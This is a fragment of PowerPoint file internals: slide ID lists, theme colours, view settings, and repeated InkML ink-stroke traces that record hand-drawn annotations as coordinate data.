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410" r:id="rId3"/>
    <p:sldId id="411" r:id="rId4"/>
    <p:sldId id="412" r:id="rId5"/>
    <p:sldId id="413" r:id="rId6"/>
    <p:sldId id="414" r:id="rId7"/>
    <p:sldId id="415" r:id="rId8"/>
    <p:sldId id="416" r:id="rId9"/>
    <p:sldId id="417" r:id="rId10"/>
    <p:sldId id="418" r:id="rId11"/>
    <p:sldId id="419" r:id="rId12"/>
    <p:sldId id="421" r:id="rId13"/>
    <p:sldId id="422" r:id="rId14"/>
    <p:sldId id="423" r:id="rId15"/>
    <p:sldId id="424" r:id="rId16"/>
    <p:sldId id="425" r:id="rId17"/>
    <p:sldId id="427" r:id="rId18"/>
    <p:sldId id="428" r:id="rId19"/>
    <p:sldId id="429" r:id="rId20"/>
    <p:sldId id="430" r:id="rId21"/>
    <p:sldId id="440" r:id="rId22"/>
    <p:sldId id="426" r:id="rId23"/>
    <p:sldId id="431" r:id="rId24"/>
    <p:sldId id="432" r:id="rId25"/>
    <p:sldId id="439" r:id="rId26"/>
    <p:sldId id="433" r:id="rId27"/>
    <p:sldId id="434" r:id="rId28"/>
    <p:sldId id="435" r:id="rId29"/>
    <p:sldId id="438" r:id="rId30"/>
    <p:sldId id="436" r:id="rId31"/>
    <p:sldId id="437" r:id="rId32"/>
    <p:sldId id="441" r:id="rId33"/>
    <p:sldId id="442" r:id="rId34"/>
    <p:sldId id="443" r:id="rId35"/>
    <p:sldId id="444" r:id="rId36"/>
    <p:sldId id="445" r:id="rId37"/>
    <p:sldId id="446" r:id="rId38"/>
    <p:sldId id="447" r:id="rId39"/>
    <p:sldId id="448" r:id="rId40"/>
    <p:sldId id="449" r:id="rId41"/>
    <p:sldId id="450" r:id="rId42"/>
    <p:sldId id="451" r:id="rId4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1"/>
    <a:srgbClr val="EEB211"/>
    <a:srgbClr val="F6D28B"/>
    <a:srgbClr val="E2BC00"/>
    <a:srgbClr val="FFD700"/>
    <a:srgbClr val="FFCC00"/>
    <a:srgbClr val="E5E18B"/>
    <a:srgbClr val="FB75FB"/>
    <a:srgbClr val="FFFFFF"/>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85" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="158" d="100"/>
          <a:sy n="158" d="100"/>
        </p:scale>
        <p:origin x="124"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2:29.416"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">3431 146 24575,'-1'5'0,"1"1"0,-1-1 0,-1-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,-8 7 0,-60 50 0,54-48 0,-4 1 0,-1-1 0,-1-2 0,0 0 0,-1-1 0,0-1 0,-47 11 0,-19 7 0,8-3 0,0-3 0,-165 18 0,-48 10 0,241-39 0,-1-2 0,-67 1 0,104-8 0,-113 11 0,-59 1 0,-570-14 0,733 0 0,0-1 0,-1-1 0,1-2 0,-41-11 0,-102-47 0,147 51 0,0 0 0,0-2 0,2-1 0,-34-29 0,-29-19 0,61 45 0,0-2 0,2 0 0,0-1 0,1-1 0,-21-30 0,-16-19 0,18 20 0,36 48 0,1 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,0-8 0,1 10 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,2 1 0,40 14 0,-38-14 0,69 21 0,-61-20 0,0 1 0,-1 0 0,1 1 0,-1 1 0,0 0 0,0 0 0,0 1 0,18 14 0,-24-15 0,-8-4 0,-19-10 0,-28-16 0,23 12 0,0 2 0,-1 1 0,0 1 0,-1 1 0,-28-4 0,54 12 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1 0 0,1-1 0,-1 4 0,-5 6 0,1 0 0,0 1 0,-5 16 0,-1 1 0,-44 100 0,46-118 0,6-21 0,6-22 0,0 20 0,1 1 0,1-1 0,0 1 0,0 0 0,1 1 0,1-1 0,0 1 0,0 0 0,1 0 0,0 1 0,15-15 0,-16 19 0,-1 1 0,1 0 0,0 0 0,1 1 0,-1-1 0,0 1 0,1 1 0,0-1 0,0 1 0,0 0 0,0 1 0,0-1 0,0 1 0,0 1 0,0 0 0,0 0 0,1 0 0,-1 1 0,0 0 0,10 2 0,12 6 0,0 0 0,-1 2 0,38 20 0,-47-21 0,-17-10 0,-1 1 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,2 3 0,-3-3 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-2 1 0,-54 14 0,43-12 0,-41 8 0,23-6 0,0 2 0,1 1 0,-54 22 0,65-22 0,21-13 0,31-23 0,-13 13 0,-13 6 0,0 0 0,-1 0 0,0 0 0,6-14 0,-8 14 0,1 1 0,0-1 0,0 1 0,1 0 0,8-9 0,-14 17 0,1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,1 2 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-1 2 0,-1 0-15,-1 1 0,0-1 1,0-1-1,0 1 0,-1 0 0,1-1 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 0 1,-7 2-1,-8 5-1157,4-1-5654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4.079"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">65 0 24575,'-1'16'0,"-1"0"0,0 0 0,-7 22 0,-1 6 0,4-14 0,-3 17 0,2 1 0,-1 70 0,9 384 0,-12-417-1365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07.440"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">217 24 24575,'-30'0'0,"17"-1"0,-1 1 0,0 0 0,1 1 0,-1 0 0,-18 5 0,29-5 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 7 0,-1 2 0,1 1 0,0 0 0,1 0 0,0 0 0,1-1 0,6 26 0,-6-34 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 0 0,7 1 0,0 0 0,0 0 0,1-1 0,-1-1 0,1 0 0,-1 0 0,1-1 0,-1-1 0,0 0 0,17-5 0,-23 6 0,0-1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1-1 0,-1 1 0,1 0 0,0-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1-1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1-8 0,0 4 0,0-1 0,-1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,-3-10 0,2 16 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,-8-5 0,4 3 0,-1-1 0,0 1 0,0 1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 2 0,-1-1 0,-12 1 0,16 1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,-5 6 0,-1 2 0,1 0 0,0 1 0,1 1 0,0-1 0,1 1 0,-9 26 0,13-35 0,2 0 0,-1 0 0,0 0 0,1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,0 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,6 9 0,-7-10 0,1 0 0,0-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 0 0,6-1 0,-2 0 0,-1 0 0,1-1 0,-1 1 0,0-2 0,0 1 0,0-1 0,0 1 0,-1-1 0,1-1 0,-1 1 0,0-1 0,4-6 0,-3 5-68,-1 0 0,0-1-1,-1 0 1,1 0 0,-1 0 0,-1 0-1,0 0 1,0-1 0,0 0 0,-1 0-1,0 1 1,0-1 0,-1-1 0,0 1-1,0 0 1,-1 0 0,0 0 0,-1 0-1,-2-11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16.182"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 30 24575,'9'0'0,"1"-1"0,-1-1 0,0 0 0,14-4 0,27-6 0,120 6 0,269 23 0,-337-10 0,373 47 0,-255-25 0,222 2 0,683-34 0,-812 31 0,-17-1 0,-209-29 0,52 3 0,-136 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,-1 5 0,3 13 0,-2-1 0,0 0 0,-3 25 0,1-20 0,1 155 0,-5 116 0,-34-8 0,10-111 0,16-78 0,2-29 0,2 0 0,4 1 0,5 97 0,23 4 0,3 38 0,-5 145 0,-9 218 0,-14-356 0,2 1905 0,-2-2088 0,-2 1 0,-14 61 0,-1-4 0,13-40 0,2-20 0,0 0 0,-2 0 0,-11 32 0,16-60 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,1-2 0,-1 1 0,0 0 0,-4-2 0,-8-1 0,1-2 0,-1 0 0,1-1 0,-24-14 0,-5-1 0,-1 7 0,-1 2 0,-78-11 0,45 9 0,39 6 0,-8-2 0,1 2 0,-88-3 0,-650 12 0,1438-1 0,-629 2 0,0 0 0,26 7 0,27 2 0,180 29 0,-190-25 0,0-4 0,129 6 0,-152-20 0,49-8 0,-51 4 0,63-1 0,13 11 0,135-5 0,-151-10 0,51-3 0,-102 14 0,87-13 0,-116 10 0,58-10 0,163-6 0,630 21 0,-835-2 0,56-11 0,-54 5 0,45 0 0,981 5 0,-521 4 0,-423-3 0,-11-1 0,199 22 0,-258-15 0,83-1 0,-86-4 0,-1 1 0,53 10 0,-5 0 0,1-3 0,151-9 0,-94-2 0,1268 3 0,-1381-2 0,52-9 0,35-2 0,-121 13 0,259-16 0,-146 5 0,197 9 0,-152 4 0,1946-2 0,-1651 31 0,-209-8 0,-123-12 0,149 6 0,-12-5 0,8 1 0,-48-11 0,173-5 0,-274-10 0,51-1 0,-124 12 0,-36 1 0,1 0 0,0 1 0,0 0 0,0 2 0,0 0 0,20 5 0,-33-5 0,0 0 0,0 0 0,0 0 0,0 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,-1 0 0,1 1 0,-1-1 0,0 1 0,0 6 0,0 16 0,-2-1 0,-1 1 0,-8 34 0,6-35 0,-11 48 0,-30 82 0,-6 25 0,41-127 0,3 1 0,2 0 0,1 79 0,6-63-1365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0.794"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">9764 13 24524,'-9764'0'0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4.079"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">65 0 24575,'-1'16'0,"-1"0"0,0 0 0,-7 22 0,-1 6 0,4-14 0,-3 17 0,2 1 0,-1 70 0,9 384 0,-12-417-1365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07.440"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">217 24 24575,'-30'0'0,"17"-1"0,-1 1 0,0 0 0,1 1 0,-1 0 0,-18 5 0,29-5 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 7 0,-1 2 0,1 1 0,0 0 0,1 0 0,0 0 0,1-1 0,6 26 0,-6-34 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 0 0,7 1 0,0 0 0,0 0 0,1-1 0,-1-1 0,1 0 0,-1 0 0,1-1 0,-1-1 0,0 0 0,17-5 0,-23 6 0,0-1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1-1 0,-1 1 0,1 0 0,0-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1-1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1-8 0,0 4 0,0-1 0,-1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,-3-10 0,2 16 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,-8-5 0,4 3 0,-1-1 0,0 1 0,0 1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 2 0,-1-1 0,-12 1 0,16 1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,-5 6 0,-1 2 0,1 0 0,0 1 0,1 1 0,0-1 0,1 1 0,-9 26 0,13-35 0,2 0 0,-1 0 0,0 0 0,1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,0 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,6 9 0,-7-10 0,1 0 0,0-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 0 0,6-1 0,-2 0 0,-1 0 0,1-1 0,-1 1 0,0-2 0,0 1 0,0-1 0,0 1 0,-1-1 0,1-1 0,-1 1 0,0-1 0,4-6 0,-3 5-68,-1 0 0,0-1-1,-1 0 1,1 0 0,-1 0 0,-1 0-1,0 0 1,0-1 0,0 0 0,-1 0-1,0 1 1,0-1 0,-1-1 0,0 1-1,0 0 1,-1 0 0,0 0 0,-1 0-1,-2-11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16.182"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 30 24575,'9'0'0,"1"-1"0,-1-1 0,0 0 0,14-4 0,27-6 0,120 6 0,269 23 0,-337-10 0,373 47 0,-255-25 0,222 2 0,683-34 0,-812 31 0,-17-1 0,-209-29 0,52 3 0,-136 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,-1 5 0,3 13 0,-2-1 0,0 0 0,-3 25 0,1-20 0,1 155 0,-5 116 0,-34-8 0,10-111 0,16-78 0,2-29 0,2 0 0,4 1 0,5 97 0,23 4 0,3 38 0,-5 145 0,-9 218 0,-14-356 0,2 1905 0,-2-2088 0,-2 1 0,-14 61 0,-1-4 0,13-40 0,2-20 0,0 0 0,-2 0 0,-11 32 0,16-60 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,1-2 0,-1 1 0,0 0 0,-4-2 0,-8-1 0,1-2 0,-1 0 0,1-1 0,-24-14 0,-5-1 0,-1 7 0,-1 2 0,-78-11 0,45 9 0,39 6 0,-8-2 0,1 2 0,-88-3 0,-650 12 0,1438-1 0,-629 2 0,0 0 0,26 7 0,27 2 0,180 29 0,-190-25 0,0-4 0,129 6 0,-152-20 0,49-8 0,-51 4 0,63-1 0,13 11 0,135-5 0,-151-10 0,51-3 0,-102 14 0,87-13 0,-116 10 0,58-10 0,163-6 0,630 21 0,-835-2 0,56-11 0,-54 5 0,45 0 0,981 5 0,-521 4 0,-423-3 0,-11-1 0,199 22 0,-258-15 0,83-1 0,-86-4 0,-1 1 0,53 10 0,-5 0 0,1-3 0,151-9 0,-94-2 0,1268 3 0,-1381-2 0,52-9 0,35-2 0,-121 13 0,259-16 0,-146 5 0,197 9 0,-152 4 0,1946-2 0,-1651 31 0,-209-8 0,-123-12 0,149 6 0,-12-5 0,8 1 0,-48-11 0,173-5 0,-274-10 0,51-1 0,-124 12 0,-36 1 0,1 0 0,0 1 0,0 0 0,0 2 0,0 0 0,20 5 0,-33-5 0,0 0 0,0 0 0,0 0 0,0 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,-1 0 0,1 1 0,-1-1 0,0 1 0,0 6 0,0 16 0,-2-1 0,-1 1 0,-8 34 0,6-35 0,-11 48 0,-30 82 0,-6 25 0,41-127 0,3 1 0,2 0 0,1 79 0,6-63-1365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0.794"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">9764 13 24524,'-9764'0'0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4.079"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">65 0 24575,'-1'16'0,"-1"0"0,0 0 0,-7 22 0,-1 6 0,4-14 0,-3 17 0,2 1 0,-1 70 0,9 384 0,-12-417-1365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07.440"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">217 24 24575,'-30'0'0,"17"-1"0,-1 1 0,0 0 0,1 1 0,-1 0 0,-18 5 0,29-5 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 7 0,-1 2 0,1 1 0,0 0 0,1 0 0,0 0 0,1-1 0,6 26 0,-6-34 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 0 0,7 1 0,0 0 0,0 0 0,1-1 0,-1-1 0,1 0 0,-1 0 0,1-1 0,-1-1 0,0 0 0,17-5 0,-23 6 0,0-1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1-1 0,-1 1 0,1 0 0,0-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1-1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1-8 0,0 4 0,0-1 0,-1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,-3-10 0,2 16 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,-8-5 0,4 3 0,-1-1 0,0 1 0,0 1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 2 0,-1-1 0,-12 1 0,16 1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,-5 6 0,-1 2 0,1 0 0,0 1 0,1 1 0,0-1 0,1 1 0,-9 26 0,13-35 0,2 0 0,-1 0 0,0 0 0,1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,0 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,6 9 0,-7-10 0,1 0 0,0-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 0 0,6-1 0,-2 0 0,-1 0 0,1-1 0,-1 1 0,0-2 0,0 1 0,0-1 0,0 1 0,-1-1 0,1-1 0,-1 1 0,0-1 0,4-6 0,-3 5-68,-1 0 0,0-1-1,-1 0 1,1 0 0,-1 0 0,-1 0-1,0 0 1,0-1 0,0 0 0,-1 0-1,0 1 1,0-1 0,-1-1 0,0 1-1,0 0 1,-1 0 0,0 0 0,-1 0-1,-2-11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07.440"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#004F8B"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">217 24 24575,'-30'0'0,"17"-1"0,-1 1 0,0 0 0,1 1 0,-1 0 0,-18 5 0,29-5 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 7 0,-1 2 0,1 1 0,0 0 0,1 0 0,0 0 0,1-1 0,6 26 0,-6-34 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 0 0,7 1 0,0 0 0,0 0 0,1-1 0,-1-1 0,1 0 0,-1 0 0,1-1 0,-1-1 0,0 0 0,17-5 0,-23 6 0,0-1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1-1 0,-1 1 0,1 0 0,0-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1-1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1-8 0,0 4 0,0-1 0,-1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,-3-10 0,2 16 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,-8-5 0,4 3 0,-1-1 0,0 1 0,0 1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 2 0,-1-1 0,-12 1 0,16 1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,-5 6 0,-1 2 0,1 0 0,0 1 0,1 1 0,0-1 0,1 1 0,-9 26 0,13-35 0,2 0 0,-1 0 0,0 0 0,1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,0 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,6 9 0,-7-10 0,1 0 0,0-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 0 0,6-1 0,-2 0 0,-1 0 0,1-1 0,-1 1 0,0-2 0,0 1 0,0-1 0,0 1 0,-1-1 0,1-1 0,-1 1 0,0-1 0,4-6 0,-3 5-68,-1 0 0,0-1-1,-1 0 1,1 0 0,-1 0 0,-1 0-1,0 0 1,0-1 0,0 0 0,-1 0-1,0 1 1,0-1 0,-1-1 0,0 1-1,0 0 1,-1 0 0,0 0 0,-1 0-1,-2-11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16.182"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
